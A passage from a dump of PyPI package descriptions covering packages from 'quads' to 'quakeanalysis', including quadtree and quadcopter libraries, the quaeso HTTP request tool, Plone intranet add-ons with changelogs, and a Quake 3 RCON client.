They're especially good for spatial indexing & image processing.An actual visualization of aquads.QuadTree:UsageFull documentation athttps://quads.readthedocs.io/en/latest/>>>importquads>>>tree=quads.QuadTree(...(0,0),# The center point...10,# The width...10,# The height...)# You can choose to simply represent points that exist.>>>tree.insert((1,2))True# ...or include extra data at those points.>>>tree.insert(quads.Point(4,-3,data=\"Samus\"))True# You can search for a given point. It returns the point if found...>>>tree.find((1,2))Point(1,2)# Or `None` if there's no match.>>>tree.find((4,-4))None# You can also find all the points within a given region.>>>bb=quads.BoundingBox(min_x=-1,min_y=-2,max_x=2,max_y=2)>>>tree.within_bb(bb)[Point(1,2)]# You can also search to find the nearest neighbors of a point, even# if that point doesn't have data within the quadtree.>>>tree.nearest_neighbors((0,1),count=2)[Point(1,2),Point(4,-4),]# And if you have `matplotlib` installed (not required!), you can visualize# the tree.>>>quads.visualize(tree)Installation$ pip install quadsRequirementsPython 3.7+ (untested on older versions but may work)Running Tests$ git clone https://github.com/toastdriven/quads.git\n$ cd quads\n$ poetry install\n$ poetry shell\n\n# Just the tests.\n$ pytest .\n\n# With coverage.\n$ pytest -s --cov=quads .\n# And with pretty reports.\n$ pytest -s --cov=quads . && coverage htmlLicenseNew BSD"} +{"package": "quad-sim-python", "pacakge-description": "quad_sim_pythonSimple quadcopter simulator in PythonInstallation:Method #0$ pip3 install quad_sim_python --upgradeMethod #1$ git clone https://github.com/ricardodeazambuja/quad_sim_python.git\n$ cd quad_sim_python\n$ pip3 install . --upgradeMethod #2$ pip3 install git+git://github.com/ricardodeazambuja/quad_sim_python --upgradeHow to use it:Check the files inside the directoryexamples:run_online.pyandrun_trajectory.py.AcknowledgmentsAdapted fromhttps://github.com/bobzwik/Quad_Exploration"} +{"package": "quadsolver", "pacakge-description": "No description available on PyPI."} +{"package": "quadtreed3", "pacakge-description": "QuadtreeA Python implementation ofQuadtree. 
The tree structure is compatible withd3-quadtree."} +{"package": "quadtree-fast", "pacakge-description": "No description available on PyPI."} +{"package": "quadwi", "pacakge-description": "Provides a framework to receive data over a socket and pump it into a shared memory."} +{"package": "quadx88", "pacakge-description": "QUADx88Configurable dynamical model of quadcopterAPI documentationTheQuadcopterClassTo construct a quadcopter object we can call the constructorimportquadx88asqxcopter=qx.Quadcopter(mass=1.15,ts=0.0083,prop_mass=0.01)The following parameters can be provided to the above constructorParameterDescriptionDefaulttsSampling time (s)1/125massTotal mass of the copter (kg)1arm_lengthArm length (m)0.225moi_xxx-x moment of inertia0.01788moi_yyx-x moment of inertia0.03014moi_zzz-z moment of inertia0.04614gravity_accgravitational acceleration (m/s2)9.81air_densityair density (kg/m3)1.225K_vKv constant of motors (rpm/V)1000motor_time_constantmotor time constant (s)0.05rotor_massrotor mass (kg)0.04rotor_radiusrotor radius (m)0.019motor_massmotor mass (kg)0.112voltage_maxmaximum voltage (V)16.8voltage_minminimum voltage (V)15.0thrust_coeffthrust coefficient of propellers0.112power_coeffpower coefficient of propellers0.044prop_masspropeller mass (kg)0.009prop_diameter_inpropeller diameter (inches)10GettersMethod/PropertyDescriptionstateNine dimensional state of the system, $x=(q, \\omega, n)$quaternionCurrent quaternionhover_rpmHovering spin in RPMeuler_angles()Current Euler angles in degreesSettersTo initialise the state of the system the following methods are availableset_initial_quaternion(q), whereqis the quaternionset_initial_angular_velocity(w)set_initial_motor_spin(spin)set_initial_euler_angles(yaw, pitch, roll, angle_unit=ANGLE_UNITS.RADIANS), whereyaw,pitchandrolland the three Euler angles (in this order) andangle_unitis the units of measurement. For example to construct a quadcopter object with an initial attitude of $\\phi=0^\\circ$, $\\theta=1^\\circ$ and $\\psi=-5^\\circ$ we can docopter=qx.Quadcopter()copter.set_initial_euler_angles(-5,0,1,ANGLE_UNITS.DEGREES)System matricesThe methodscontinuous_linearised_matricesanddiscrete_linearised_matricesreturn a dictionary with the continuous-time and discrete-time matrices of the linearised system respectively. 
The discrete-time linearised system has the form\n$$\\begin{aligned}\nx_{t+1} =& Ax_t + Bu_t,\\\\\ny_t =& Cx_t.\n\\end{aligned}$$ Nonlinear dynamical system: To simulate the nonlinear model you can use move(u), which updates the system state following the application of a given control action for the duration of the sampling time."} +{"package": "quaerere-base-client", "pacakge-description": "About: quaerere-base-client contains the common elements shared between components of the Quaerere Platform. Links: Documentation: http://quaerere-base-client.readthedocs.io/ PyPI: https://pypi.org/project/quaerere-base-client/ Source: https://github.com/QuaererePlatform/quaerere-base-client.git Installation: Using pip: pip install quaerere-base-client. Or using setup.py: python setup.py install. Tests can be run using: python setup.py test. Documentation can be generated using: python setup.py build_sphinx. Usage"} +{"package": "quaerere-base-common", "pacakge-description": "About: quaerere-base-common contains the common elements shared between components of the Quaerere Platform. Links: Documentation: http://quaerere-base-common.readthedocs.io/ PyPI: https://pypi.org/project/quaerere-base-common/ Source: https://github.com/QuaererePlatform/quaerere-base-common.git Installation: Using pip: pip install quaerere-base-common. Or using setup.py: python setup.py install. Tests can be run using: python setup.py test. Documentation can be generated using: python setup.py build_sphinx. Usage"} +{"package": "quaerere-base-flask", "pacakge-description": "About: quaerere-base-flask contains the common elements shared between components of the Quaerere Platform. Links: Documentation: http://quaerere-base-flask.readthedocs.io/ PyPI: https://pypi.org/project/quaerere-base-flask/ Source: https://github.com/QuaererePlatform/quaerere-base-flask.git Installation: Using pip: pip install quaerere-base-flask. Or using setup.py: python setup.py install. Tests can be run using: python setup.py test. Documentation can be generated using: python setup.py build_sphinx. Usage"} +{"package": "quaerere-columbia-common", "pacakge-description": "About: quaerere-columbia-common contains the common elements shared between the columbia micro-service\nand client. Links: Documentation: http://quaerere-columbia-common.readthedocs.io/ PyPI: https://pypi.org/project/quaerere-columbia-common/ Source: https://github.com/QuaererePlatform/columbia-common.git Installation: Using pip: pip install quaerere-columbia-common. Or using setup.py: python setup.py install. Tests can be run using: python setup.py test. Documentation can be generated using: python setup.py build_sphinx. Usage"} +{"package": "quaerere-willamette", "pacakge-description": "This is a part of the Quaerere Platform and is intended to be used with the other Quaerere Platform micro-services. Deployment: The preferred method of deployment is through the docker images, however the standard setup.py method will be supported. API. Tasks. Configuration: Most configuration is done with environment variables"} +{"package": "quaerere-willamette-client", "pacakge-description": "About: quaerere-willamette-client is the client library used to interact with the willamette service RESTful API. Links: Documentation: http://willamette-client.readthedocs.io/ PyPI: https://pypi.org/project/quaerere-willamette-client/ Source: https://github.com/QuaererePlatform/willamette-client.git Installation: Using pip: pip install quaerere-willamette-client. Or using setup.py: python setup.py install. Tests can be run using: python setup.py test. Documentation can be generated using: python setup.py build_sphinx. Usage"} +{"package": "quaerere-willamette-common", "pacakge-description": 
"Aboutquaerere-willamette-commoncontains the common elements shared between the willamette micro-service\nand client.LinksDocumentation:http://quaerere-willamette-common.readthedocs.io/PyPI:https://pypi.org/project/quaerere-willamette-common/Source:https://github.com/QuaererePlatform/willamette-common.gitInstallationUsing pip:pipinstallquaerere-willamette-commonOr using setup.py:pythonsetup.pyinstallTests can be ran using:pythonsetup.pytestDocumentation can be generated using:pythonsetup.pybuild_sphinxUsage"} +{"package": "quaeroml-serving", "pacakge-description": "No description available on PyPI."} +{"package": "quaesit", "pacakge-description": "QuAESiTA framework for easy development of agent-based modelsQuaesit stands forQuickandEasySimulationTools. This package is based on the concepts and architecture of platforms such as Netlogo, as well as other Python packages for agent-based modelling, namely mesa. It is also based on the architecture of ExPaND, a model developed by me for simulating human migrations in South America.Documentation and Tutorialjgregoriods.github.io/quaesit"} +{"package": "quaeso", "pacakge-description": "\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \n\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\n\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\n\u2588\u2588\u2551\u2584\u2584 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\n\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\n \u255a\u2550\u2550\u2580\u2580\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \n---------------------------------------------------\npython cli program to send requestsIs it just me or is curl a little too complicated?\nWant something simpler in life? something made for humans? 
Try quaeso -- A Python program that reads a json/yml file for request data and sends the requestInstallationpip install this repo.\n(Note: Incompatible with Python 2.x)pip3installquaeso(or)pipinstallquaesoUsage exampleTo get help with commandline argumentsquaeso--helpUsing Command-line Argumentsquaeso-f\"some/folder/myrequest.yml\"(or)quaeso-f\"some/folder/myrequest.json\"Colorize Outputquaeso-f\"some/folder/myrequest.yml\"-cDisclaimersometimes the quaeso command doesn't work in windows if the package is installed globally.to avoid this, install the package in a local virtual envfirst, create a envpython3-mvenvenv_for_quaesoactivate that env.\\env_for_quaeso\\Scripts\\activateand then pip install. But you will have to activate that env everytime you want to use quaeso.IO Redirectionthe response is written to stdout and headers/status are written to stderr so that users can take IO redirection to their advantage. This works on windows, linux and mac.quaeso-f\"some/folder/myrequest.yml\">res.json2>res_headers.txtboth stdout and stderr can be redirected to the same filequaeso-f\"some/folder/myrequest.yml\">res.txt2>&1Sample request file (myrequest.yml)GETurl:https://cdn.animenewsnetwork.com/encyclopedia/api.xml?anime=4658method:getparams:offset:2limit:100headers:accept:text/xmlaccept-language:entimeout:5000File Download (quaeso -f \"some/folder/myrequest.yml\" > book.pdf)url:http://do1.dr-chuck.com/pythonlearn/EN_us/pythonlearn.pdfmethod:getPOSTurl:https://jsonplaceholder.typicode.com/todos/method:POSTheaders:Authorization:Basic bXl1c2VybmFtZTpteXBhc3N3b3Jkcontent-type:application/jsondata:title:walk the dogcompleted:falsetimeout:5000PUTurl:https://jsonplaceholder.typicode.com/todos/1method:PUTheaders:content-type:application/jsondata:title:walk the dogcompleted:truetimeout:5000DELETEurl:https://jsonplaceholder.typicode.com/todos/1method:DELETEComplete request file with all available fields (myrequest.yml)method:XXX# (REQUIRED) GET, OPTIONS, HEAD, POST, PUT, PATCH, or DELETEurl:XXX# (REQUIRED) must be prefixed with http:// or https://params:# url query parameters. have as many as you likeoffset:0limit:10data:# data for POSTname:johnage:22hobbies:-running-eating-sleeping# you can also type data in json format instead of yamldata:|{\"name\": \"john\",\"age\": 22,\"hobbies\": [\"running\", \"eating\", \"sleeping\"]}headers:# have as many as you likeContent-Type:application/jsonAuthorization:Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5ccookies:# have as many as you likemycookie:cookievaluemyothercookie:othercookievaluetimeout:3.14# secondsallow_redirects:true# true or falseproxies:# have as many as you likehttp:http://10.10.1.10:3128https:https://10.10.1.11:1080ftp:ftp://10.10.1.10:3128# EITHER verify server's TLS certificate. true or falseverify:true# OR path to a CA bundle to useverify:some/folder/cacert.crt# EITHER path to single ssl client cert file (*.pem)cert:some/folder/client.pem# OR (*.cert), (*.key) pair.cert:-some/folder/client.cert-some/folder/client.keyDevelopment setupClone this repo and install packages listed in requirements.txtpip3install-rrequirements.txtMetaM. Zahash \u2013zahash.z@gmail.comDistributed under the MIT license. 
SeeLICENSEfor more information.https://github.com/zahash/ContributingFork it (https://github.com/zahash/quaeso/fork)Create your feature branch (git checkout -b feature/fooBar)Commit your changes (git commit -am 'Add some fooBar')Push to the branch (git push origin feature/fooBar)Create a new Pull Request"} +{"package": "quagmire", "pacakge-description": "QuagmireQuagmire is a Python surface process framework for building erosion and deposition models on highly parallel, decomposed structured and unstructured meshes.Quagmire is structured into three major classes that inherit methods and attributes from lower tiers.The Surface Processes class inherits from the Topography class, which in turn inherits from TriMesh or PixMesh depending on the type of mesh.InstallationNumpy and a fortran compiler, preferablygfortran, are required to install Quagmire.python setup.py buildIf you change the fortran compiler, you may have to add the\nflagsconfig_fc --fcompiler=when setup.py is run\n(see docs fornumpy.distutils).python setup.py installDependenciesRunning this code requires the following packages to be installed:Python 3.7.x and aboveNumpy 1.9 and aboveScipy 0.15 and abovempi4pypetsc4pystripyh5py(optional - for saving parallel data)Matplotlib (optional - for visualisation)PETSc installationPETSc is used extensively via the Python frontend, petsc4py. It is required that PETSc be configured and installed on your local machine prior to using Quagmire. You can use pip to install petsc4py and its dependencies.[sudo] pip install numpy mpi4py\n[sudo] pip install petsc petsc4pyIf that fails you must compile these manually.HDF5 installationThis is an optional installation, but it is very useful for saving data that is distributed across multiple processes. If you are compiling HDF5 fromsourceit should be configured with the--enable-parallelflag:CC=/usr/local/mpi/bin/mpicc ./configure --enable-parallel --enable-shared --prefix=\nmake\t# build the library\nmake check\t# verify the correctness\nmake installYou can then point to this install directory when you installh5py.UsageQuagmire is highly scalable. All of the python scripts in thetestssubdirectory can be run in parallel, e.g.mpirun -np 4 python stream_power.pywhere the number after the-npflag specifies the number of processors.TutorialsTutorials with worked examples can be found in theNotebookssubdirectory. These are Jupyter Notebooks that can be run locally. We recommend installingFFmpegto create videos in some of the notebooks.The topics covered in the Notebooks include:MeshingSquare meshElliptical meshMesh refinement (e.g. 
Lloyd's mesh improvement)Poisson disc samplingMesh Variablesquagmire function interface (requires a base mesh)Flow algorithmsSingle and multiple downhill pathwaysAccumulating flowErosion and depositionLong-range stream flow modelsShort-range diffusive evolutionLandscape evolutionExplicit timestepping and numerical stabilityLandscape equilibrium metricsBasement upliftRelease Notes v0.5.0bThis is the first formal 'release' of the code whichSummary of changesIntroducing quagmire.function which is a collection of lazy-evaluation objects similar to underworld functionsIntroducing MeshVariables which wrap PETSc data vectors and provide interoperability with quagmire functionsProviding context manager support for changes to topography that automatically update matrices appropriatelyMaking all mesh variable data arrays view only except for assignment from a suitably sized numpy array (this is to ensure correct synchronisation of information in parallel).various @property definitions to handle cases where changes require rebuilding of data structuresmaking many mesh methods private and exposing them via functionsupstream integration is a function on the meshupstream / downstream smoothing is via a mesh functionrbf smoothing builds a manager that provides a function interface"} +{"package": "quahris", "pacakge-description": "No description available on PyPI."} +{"package": "quaidan", "pacakge-description": "UNKNOWN"} +{"package": "quail", "pacakge-description": "Quail is a Python package that facilitates analyses of behavioral data from memory experiments. (The current focus is on free recall experiments.) Key features include:Serial position curves (probability of recalling items presented at each presentation position)Probability of Nth recall curves (probability of recalling items at each presentation position as the Nth recall in the recall sequence)Lag-Conditional Response Probability curves (probability of transitioning between items in the recall sequence, as a function of their relative presentation positions)Clustering metrics (e.g. single-number summaries of how often participants transition from recalling a word to another related word, where \u201crelated\u201d can be user-defined.)Many nice plotting functionsConvenience functions for loading in dataAutomatically parse speech data (audio files) using wrappers for the Google Cloud Speech to Text APIThe intended user of this toolbox is a memory researcher who seeks an easy way to analyze and visualize data from free recall psychology experiments."} +{"package": "quailbox", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "quaive.app.taxonomy", "pacakge-description": "A taxonomy browser for ploneintranetFeaturesAllows browsing through a hierarchical taxonomySupports search on taxonomy and on content withinDedicated search and group view for each taxonomy termBackgroundThe app has been discussed and specified at\n-https://github.com/quaive/ploneintranet.prototype/issues/272DocumentationFull documentation for end users can be found in the \u201cdocs\u201d folder, and is also available online athttp://docs.quaive.netTranslationsThis product has been translated intoGerman (thanks, Angela Merkel)InstallationInstall quaive.app.taxonomy by adding it to your buildout:[buildout]\n\n...\n\neggs =\n quaive.app.taxonomyYour Quaive instance will need to register a vdex vocabulary and add the identifier of that vocabulary to the solr index configuration.Run buildout to update your instance:bin/buildoutAdd the vocabulary identifier to following registry entries:ploneintranet.search.filter_fields\nploneintranet.search.facet_fieldsAdd an adapter to configure an app tile, see quaive/app/taxonomy/tests/configure.zcml for an example.ContributeIssue Tracker:https://github.com/collective/quaive.app.taxonomy/issuesSource Code:https://github.com/collective/quaive.app.taxonomyDocumentation:https://docs.quaive.netSupportIf you are having issues, please let us know.\nWe have a mailing list located at:ploneintranet-dev@groups.ioLicenseThe project is licensed under the GPLv2.ContributorsAlexander Pilz,pilz@syslab.comChangelog1.2.2 (2017-11-20)Public release.1.2.1 (2017-08-28)Fixes:(slc #15736) Don\u2019t throw error if search term is unicode [deroiste]1.2.0 (2017-05-02)Fixes:Decorate the app view with IAppView to make the app\ncompatible with ploneintranet master.\n[ale]1.1.7 (2016-12-01)New features:Translation labels.\n[angeldasangel]1.1.6 (2016-11-21)Nothing changed.1.1.5 (2016-11-17)Fixes:Fix sidebar search injection [deroiste]Sidebar Search: search by partial taxonomy terms [deroiste]1.1.4 (2016-10-24)New features:Sort by date when grouping by workspace and author [deroiste]Fixes:Fix test setup: import config for docconv1.1.3 (2016-10-14)Fixes:Adapt to new App structure. All parameters come from the App now,\nnot the requestAdapt to changed search / proto view in ploneintranet1.1.2 (2016-09-09)Fixes:Fix tests: use the app as the search tile context [deroiste]Fix sidebar enlarger target [pilz]1.1.1 (2016-09-08)Fixes:Fix injection target [pilz]1.1 (2016-09-08)Fixes/New features:Sort grouped results by titleAdd search grouping by workspace and authorsidebar-search: use solr instead of the catalog\nThe normal Sidebar view uses the catalog, presumably to avoid the delay\ncaused by asynchronous indexing with solr.sidebar-search: handle unicode vocab termsAdd the option to configure a separate vocab index\nThis allows the search index to have a different id from the\nvocabulary. 
It\u2019s configured on the app_parameters e.g.\n{\u2018vocabulary_index\u2019: \u2018someidx\u2019}Also search by vocab termsImplement sidebar search\nDesign: quaive/ploneintranet.prototype#272Updated to app objects\nAlso, the vocabulary does not need to be passed as a GET parameter any\nmore, since it is now defined in the app_parameters.Include documents in the sidebar, implement searchImproved testing, better handling of values1.0a1 (2016-07-16)Initial release.\n[pilz]"} +{"package": "quaive.resources.ploneintranet", "pacakge-description": "ContributeIssue Tracker:https://github.com/quaive/quaive.resources.ploneintranet/issuesSource Code:https://github.com/quaive/quaive.resources.ploneintranetDocumentation:https://github.com/quaive/ploneintranet/blob/master/docs/development/releasing.rstSupportIf you are having issues, please let us know:https://groups.io/g/ploneintranet-devLicenseThe project is licensed under the GPLv2.Contributorsale-rt,pisa@syslab.comChangelog2.0.8 (2017-11-20)New:Update diazo and js2.0.7 (2017-11-08)Fixed:Drop the theme \u201cback-to-portal\u201d on screen help.\nDiazo will set the corrent one from the theme when replacing the site logo.2.0.6 (2017-10-23)New:Update diazo and js to fix IE11 issues2.0.5 (2017-10-11)New:Update diazo and js2.0.4 (2017-10-11)New:Update diazo and js2.0.3 (2017-09-22)New:Update diazo and js2.0.2 (2017-09-20)New:Update diazo2.0.1 (2017-09-09)New:New js build2.0.0 (2017-09-01)New:The latest prototype uses patternslib 3 and webpack to bundle\nthe javascrcipt resources.1.3.28 (2017-08-29)Added:A diazo rule to properly render the on screen help toggle button\n(Refs. Syslab #15824).\n[Alessandro Pisa]1.3.27 (2017-08-29)Fixes:Include the patch fromhttps://github.com/Patternslib/Patterns/pull/510that fixes a collision between pat-modal and pat-collapsible.New:Updated the theme\n[Alessandrop Pisa]1.3.26 (2017-07-24)Prepare the diazo rules for the help bubblesUnderstand the is_modal_panel view attributeAdded rules for panelsUpdated the js releaseUpdated diazo [Alessandro Pisa]1.3.25 (2017-06-13)Updated bundle and diazo theme [Alessandro Pisa]1.3.24 (2017-06-05)Updated bundle and diazo theme [Alessandro Pisa]1.3.23 (2017-05-30)Clean up annotorius [Alessandro Pisa]Fix Makefile [Alessandro Pisa]Via Proto: Updated Blue theme for Quaive, plus new Quaive logo [Wolfgang Thomas]Back to blue [Alessandro Pisa, Wolfgang Thomas]Simplify the diazo rules [Alessandro Pisa]1.3.21 (2017-05-12)Copy the lang attribute of the html element [Alessandro Pisa]Updated js bundle [Alessandro Pisa]1.3.21a1 (2017-05-09)Simplify the diazo rules and copy the title tag from Plone\n(see quaive/ploneintranet#1027) [Alessandro Pisa]1.3.20 (2017-05-08)Update CSS [Alessandro Pisa]1.3.20a1 (2017-04-28)Simplify diazo rules [Alessandro Pisa]Updated theme and bundle [Alessandro Pisa]1.3.19 (2017-03-29)Updated bundle [Alessandro Pisa]1.3.18 (2017-03-07)Updated Proto [Alessandro Pisa]1.3.17 (2017-02-21)Do not render the Plone toolbar when we do not need it [Alessandro Pisa]1.3.16 (2017-02-01)Nothing changed yet.1.3.15 (2017-01-18)Nothing changed yet.1.3.14 (2016-12-20)Drop the alpha [Guido A.J. Stevens]Update changelog [Guido A.J. Stevens]ignore auto-backups [Guido A.J. Stevens]Don\u2019t show a no-op global settings link [Guido A.J. Stevens]update proto [Alexander Pilz]fixurl doesn\u2019t like the if statements on the same line [Alexander Pilz]Fix regression for Library details page (ported from ikath) Seehttps://git.syslab.com/ikath/quaive.resources.ikath/commit/6ffe0Disable q.r.p. 
resources in Barceloneta fixeshttps://github.com/quaive/ploneintranet/issues/876[Guido A.J. Stevens]update proto [Alexander Pilz]update proto [Alexander Pilz]Let\u2019s be Quaive [Alessandro Pisa]update js bundle [Alexander Pilz]Back to development: 1.3.0a14 [Wolfgang Thomas]1.3.0a13 (2016-11-07)simplify the rules for the whole password reset story. This implies that all\nrelevant templates are overriden in ploneintranet, see quaive/ploneintranet#870\n[Wolfgang Thomas]Support newsitem view [Guido Stevens]Add 16x9 placeholder for news magazine [Guido Stevens]1.3.0a12 (2016-11-01)Preparing release 1.3.0a12 [Alexander Pilz]Update diazo [Alexander Pilz]Back to development: 1.3.0a12 [Alexander Pilz]1.3.0a11 (2016-10-27)Preparing release 1.3.0a11 [Alexander Pilz]update diazo [Alexander Pilz]Back to development: 1.3.0a11 [Alessandro Pisa]1.3.0a10 (2016-10-26)Catch urls like ++add++ptype (used in tests) [Alessandro Pisa]Updated bundle so that redactor triggers the change event. Needed for autosave [Alexander Pilz]new bundle where redactor triggers the change event [Alexander Pilz]Fix fallback rules to only catch if a visual portal wrapper is present [Alexander Pilz]updated diazo [Alexander Pilz]added rule for posts [Alexander Pilz]Rulefix for calendar [Alexander Pilz]Rules for calendar [Alexander Pilz]update diazo [Alexander Pilz]Updated proto [Alexander Pilz]Added default user icons [Alexander Pilz]Also copy defaultusers [Alexander Pilz]Remove empty.html fallback [Cillian de Roiste]update diazo [Alexander Pilz]Move main_template test over from ploneintranet.theme and fix plone.app.blocks dependency [Guido A.J. Stevens]Move dependencies and registry setup/uninstall from theme refshttps://github.com/quaive/ploneintranet/commit/dba9d8b09b10ac15a1f3e6274d11cd0437ae1fdd[Guido A.J. Stevens]Audit zope.Public refshttps://github.com/quaive/ploneintranet/issues/765[Guido A.J. Stevens]make diazo [Alessandro Pisa]Consolidate news rules [Guido A.J. Stevens]Added empty placeholder app icon [Manuel Reinhardt]Don\u2019t depend on section ids (controlled by content editors) [Guido A.J. Stevens]Reorganize diazo rules [Guido A.J. Stevens]Update some outdated rules [Guido A.J. Stevens]Hook up news publisher template [Guido A.J. Stevens]Hook up news app, refs #337 [Guido A.J. Stevens]Back to development: 1.3.0a10 [Guido A.J. Stevens]1.3.0a9 (2016-09-16)Update changelog [Guido A.J. Stevens]Update proto from c2ab9deba47758a383d029f8541c236b6990509 [Guido A.J. Stevens]Give a preview to this theme [Alessandro Pisa]Back to development: 1.3.0a9 [Alexander Pilz]1.3.0a8 (2016-09-14)Update proto [pilz]Update bundle which now cleans up the moment-timezone messup, reducing size\n[pilz]Include rule for calendar app\n[pilz]1.3.0a7 (2016-09-12)Fix manifest [Guido A.J. Stevens]Update changelog [Guido A.J. Stevens]Fix regression that broke workspace subclasses [Guido A.J. Stevens]actually write converted files to the diazo dir [Alexander Pilz]Also view the mails [Alessandro Pisa]update bundle [Alexander Pilz]Back to development: 1.3.0a7 [Alexander Pilz]1.3.0a6 (2016-08-31)Prototype Style update1.3.0a5 (2016-08-31)Diazo rules update1.3.0a4 (2016-08-29)Prototype Style update1.3.0a3 (2016-08-25)Fix merge regression that damaged 85c37862a8e2 [Guido A.J. Stevens]1.3.0a2 (2016-08-25)Shell change1.3.0a1 (2016-08-22)Initial version implementing the shell change1.2.5 (2016-08-19)Monkey scroll fix directly into bundle. Seehttps://github.com/Patternslib/Patterns/pull/455[Guido A.J. Stevens]1.2.4 (2016-08-18)Extra release to verify that 1.2.3. 
was not a brownbag release.fix postrelease typo [Guido A.J. Stevens]1.2.3 (2016-08-18)New bundle with the actual inject API change, finally [Guido A.J. Stevens]Update Makefile to remove old releases, update symlinks to actually point to LATEST [Guido A.J. Stevens]Revert \u201cUpdated from prototype\u201d [Guido A.J. Stevens]Fix Makefile to handle bundle again, add new bundle [Alexander Pilz]new bundle [Alexander Pilz]update patternslib to includehttps://github.com/Patternslib/Patterns/pull/452/commits/35e59cba63aa6e51a35b1fe4a0df79d391462849Back to development: 1.2.3 [Alexander Pilz]1.2.2 (2016-08-18)Pull in another Patternslib:inject_delay [Guido A.J. Stevens]1.2.1 (2016-08-10)Pull in Patternslib:inject_delay [Guido A.J. Stevens]1.2.0 (2016-08-08)Remove FIXME, ongoing work in quaive/ploneintranet:update-proto will fix that [Guido A.J. Stevens]Hook up global messaging counter + link [Guido A.J. Stevens]Hook up messaging [Guido A.J. Stevens]Sort uninstaller downwards [Guido A.J. Stevens]Promote theme profile installer in GS/QI UI [Guido A.J. Stevens]Back to development: 1.2.0a4 [Guido A.J. Stevens]1.2.0a3 (2016-08-01)Remove circular ploneintranet <-> resources dependency, disable autoinclude [Guido A.J. Stevens]Modernize setup.py author pointers [Guido A.J. Stevens]Theme updated to pull in mail content type related stuff [Alessandro Pisa]Updated the Makefile [Alessandro Pisa]1.2.0a2 (2016-07-27)Modified the rules.xml as in quaive/ploneintranet#510 [ale-rt]1.2.0a1 (2016-07-26)Updated static folder after quaive/ploneintranet#476 [ale-rt]1.2.0a0 (2016-07-25)Inital release [ale-rt]"} +{"package": "quake", "pacakge-description": "quake.360.cn\u7684API\u5e93Free software: MIT licenseDocumentation:https://quake.readthedocs.io.CreditsThis package was created withCookiecutterand thekin9-0rz/cookiecutter-pypackageproject template."} +{"package": "quake3rcon", "pacakge-description": "quake3rconA tiny library for using Quake 3's RCON protocol feature for some game servers likeFiveM.\nThe RCON protocols are used to remotely control game servers, i.e. execute commands on a game server and receive the respective results.LicenseMIT LicenseCopyright (c) 2022 hellyetPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.class Rconfunctionargsreturnsdescription__init__ip (ip), port (int), password (str), timeout (float, optional)NoneInitialize rcon connection__del__NoneNoneClose rcon connection on object destructionrecvNoneNoneGets server responsesendcommand (str)strSend rcon commandHow i can use this?To install runpip install quake3rconThis is an example using q3rcon-py in your codefromquake3rcon.rconimportRconrcon=Rcon('192.168.0.1',30120,'yourstrongpassword')# Connecting to RCONresponce=rcon.send('command and some args for it')# Send RCON commandprint(responce)# Show server response# Do some stuffdelrcon# Delete object and disconnect from RCON"} +{"package": "quakeanalysis", "pacakge-description": "This is prototype to analyse earthquake data fromhttps://earthquake.usgs.gov/https://earthquake.usgs.gov/earthquakes/feed/v1.0/geojson.phpenter a place name to get distance from nearest earthquakeearthquake_distance(\u2018place\u2019)enter a place name to get time of nearest earthquakeearthquake_time(\u2018place\u2019)enter a place name to get place of nearest earthquakeearthquake_place(\u2018place\u2019)enter a place name to get longitude of nearest earthquakeearthquake_longitude(\u2018place\u2019)enter a place name to get latitude of nearest earthquakeearthquake_latitude(\u2018place\u2019)get the magnitude of nearest 